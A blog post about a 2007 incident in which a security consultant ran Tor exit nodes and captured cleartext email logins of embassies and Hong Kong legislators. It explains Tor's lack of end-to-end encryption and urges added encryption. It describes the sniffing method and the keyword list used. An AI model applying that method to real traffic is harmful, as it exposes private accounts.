Ars Technica is reporting that a security specialist was able to grab a bunch of login/passwords after running Tor nodes to illustrate proper and improper use of the widely-used anonymity network. In this particular case, Dan Egerstad volunteered to be part of the Tor network by running “exit nodes,” and boy did he grab a bunch of sensitive logins and passwords.
Particularly embarrassing is the fact the list contained use by embassy staff of Uzbekistan, Kazakhstan, Iran and India among others. There seems to be no other explanation other than the IT departments of these governments actually recommending Tor as standard operating procedure to access their accounts from abroad.
That’s not an appropriate use for Tor at all.
When this story broke in India, one of the news outlets tested the username/password to get into the account of a government official (which is of questionable journalistic ethics):
To check the authenticity, The Indian Express sent a test mail to the Indian Ambassador in China on her official email ID and, using the password posted online, was able to access it. The email account of the Indian Ambassador to China contained details of a visit by Rajya Sabha member Arjun Sengupta to Beijing earlier this month for an ILO conference. There was also a transcript of a meeting this evening which a senior Indian official had with the Chinese Foreign Minister.
Also on this list of shame were Hong Kong political parties and Legislative Council members. Being a former resident of HK, this is particularly bizarre since the HK government has prided itself on being IT savvy on the world stage, even bragging about being the first in the world to use E-certificates on the Smart-ID cards all Hong Kongers carry. It’s ironic the E-cert system is so secure, complex and unusable in HK, while politicians are using cleartext mail protocols and sending data through random untrusted computers.
Egerstad has taken special attention to HK (SCMP, Sep 9, 2007, subscription):
Swedish computer security consultant Dan Egerstad hopes to come to Hong Kong next month and visit some of the legislators and NGOs he exposed on his website as having weak internet security – but only if the police promise not to arrest him at the airport.
Mr Egerstad, 21, published the e-mail passwords of prominent legislators such as the Democratic Party’s Sin Chung-kai and Liberal Party vice-chairman Miriam Lau Kin-yee on the website dErangedsecurity.com. He also published the IP addresses of the e-mail servers.
Mr Egerstad trawled through the e-mails of the One Country Two Systems Research Institute of China and the Liaison Office of the Dalai Lama for Japan and East Asia, as well as the Hong Kong Human Rights Monitor.
How Tor Works
A quick recap: the Tor system works by using a volunteer network of computers that offer to relay your Web traffic, encrypted and anonymously, through the Tor network. It relays your traffic through three Tor intermediary nodes, the idea being that each relay node knows which neighboring node packets are coming from and going to, but no one knows the entire path to the final destination address. There are some really smart people behind Tor like Roger Dingledine, and most experts agree that for anonymity, it does a very good job.
The problem is, people are using Tor without understanding exactly what it does and does not provide.
The weak link is when a user’s data finally emerges at the last computer (the exit node) which relays the request to the public Internet. Anyone operating a final exit node can see what you’re sending and receiving. So while Tor provides for end-user anonymity at the network/packet level (IP address), it does not provide for end-to-end data secrecy. The traffic coming off the the exit node on your behalf is exactly what protocol and data your application (Web browser, mail program, instant messenger, etc) sent out.
If it’s a cleartext data stream like HTTP or mail (IMAP or POP3) then anyone running a Tor exit node can see and capture it. And that’s what Egerstad did — he monitored his exit nodes for:
â€œgov, government, embassy, military, war, terrorism, passport, visaâ€ as well as domains belonging to governments.
Tor uses the SOCKS proxy protocol to receive transactions for the Tor network. SOCKS has been around a long time and is a solid generic protocol. It handles HTTP (Web) requests as well as other data streams, so yes, it can support end-to-end encrypted sessions using HTTPS or secure sockets. So if you use Tor, combine it with a secure protocol if you need data secrecy! This is where people may get confused — data is encrypted within the Tor network, but it exits the Tor network exactly as your browser or application requested — most likely unencrypted. So use an end-to-end encryption solution in addition to Tor, if that’s what you need.
If you’re surfing CNN or ESPN to get the latest sports scores, no problem. If you’re logging into a system or sending/receiving e-mail, you better make sure it’s encrypted.
Tor has also been in the news related to a phishing/trojan scheme, where spam email asked folks to download Tor, but it really pointed to a trojan program instead.
It’s important to note in both instances, Tor is not the one at fault. The trojan problem is your typical phishing problem — never click on any hyperlink ever sent to you in email, and don’t trust any sites you didn’t find or search yourself.
Tor is a great program, but it’s not a cure-all. You need a wide spectrum of tools to do it right, or you can also do what many corporations do — require the use of a Virtual Private Network, and all your data packets are routed and encrypted back to a trusted corporate home base.
Egerstad had this final harsh warning on his blog:
These governments told their users to use ToR, a software that sends all your traffic through not one but three other servers that you know absolutely nothing about. Yes, two are getting encrypted traffic but that last exit node is not. There are hundreds of thousands ToR-users but finding these kinds of accounts wasâ€¦ hmmâ€¦ chocking! The person who wrote the security policy on these accounts should reconsider changing profession, start cleaning toilets! These administrators are responsible for giving away their own countries secrets to foreigners. I canâ€™t call it a mistake, this is pure stupidity and not forgivable!
ToR isnâ€™t the problem, just use it for what itâ€™s made for.
Tor is very good for anonymity, but does nothing for adding any data security. In fact, it’s likely more risky, because you are handing traffic over to a stranger (exit node) in cleartext.
I don’t use Tor much, as I don’t often need anonymity. It’s also a sluggish performer because of the three relays for traffic. But when I do use it, I make sure to use Firefox with a virgin clean profile — no cookies, no stored data, no caching, no browsing history. (You can configure Firefox to ask for what profile you want on startup.)
So the big headline? This is not a Tor insecurity. You wouldn’t complain to Home Depot that masking tape failed to seal your PVC pipes. You have to use the right tool for the right job, and the Uzbek government is learning this the hard way.